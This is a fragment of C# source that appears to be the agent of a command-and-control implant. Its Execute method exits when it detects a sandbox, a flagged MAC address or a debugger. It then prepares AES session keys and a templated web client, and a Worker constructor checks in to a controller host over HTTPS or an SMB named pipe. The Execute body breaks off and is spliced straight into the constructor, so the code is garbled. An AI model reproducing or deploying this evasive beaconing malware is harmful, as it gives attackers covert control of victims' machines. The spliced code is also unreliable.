public static void Execute(string json, string cookie, NamedPipeClientStream pipe)
{
if (containsSandboxArtifacts() || isBadMac() || isDebugged())
{
return;
}
byte[] aeskey;
byte[] aesiv;
string agentid = "";
Thread servert = null;
bool smbstarted = false;
bool managed = injectionmanaged;
List <string> smblisteners = new List <string>();
Dictionary <string, List <Core.Utility.TaskMsg> > commands = new Dictionary <string, List <Core.Utility.TaskMsg> >();
Random r = new Random();
Core.Utility.AgentIdMsg agentidmsg = Core.Utility.GetAgentId(json);
agentid = agentidmsg.agentid;
aeskey = Convert.FromBase64String(agentidmsg.sessionkey);
aesiv = Convert.FromBase64String(agentidmsg.sessioniv);
Core.Utility.CookiedWebClient wc = new Core.Utility.CookiedWebClient();
WebHeaderCollection webHeaderCollection = new WebHeaderCollection();
webHeaderCollection.Add(HttpRequestHeader.UserAgent, "#USERAGENT#");
#HEADERS #
public Worker(string json, string cookie, NamedPipeClientStream pipe)
{
Random r = new Random();
this.pipe = pipe;
Core.Utility.AgentIdMsg agentidmsg = Core.Utility.GetAgentId(json);
agentid = agentidmsg.agentid;
aeskey = Convert.FromBase64String(agentidmsg.sessionkey);
aesiv = Convert.FromBase64String(agentidmsg.sessioniv);
this.wc = CreateWebClient(cookie, host);
string rpaddress = String.Format("https://{0}:{1}/{2}", host, port, pagepost[new Random().Next(pagepost.Length)]);
if (this.pipe != null)
{
Core.Utility.SendCheckinSMB(agentid, aeskey, aesiv, this.pipe);
}
else
{
Core.Utility.SendCheckinHttp(agentid, aeskey, aesiv, rpaddress, param, wc);
}
}
